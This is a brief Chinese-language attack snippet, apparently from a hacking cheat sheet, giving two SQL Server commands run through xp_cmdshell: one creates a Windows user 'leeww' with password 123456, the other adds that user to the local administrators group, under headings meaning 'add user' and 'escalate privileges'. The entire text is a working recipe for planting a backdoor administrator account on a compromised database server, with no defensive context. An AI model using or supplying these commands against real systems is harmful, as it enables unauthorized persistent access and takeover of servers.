添加用户
exec master.dbo.xp_cmdshell 'net user leeww 123456 /add'
提升权限
exec master.dbo.xp_cmdshell 'net localgroup administrators leeww /add'
(注意空格)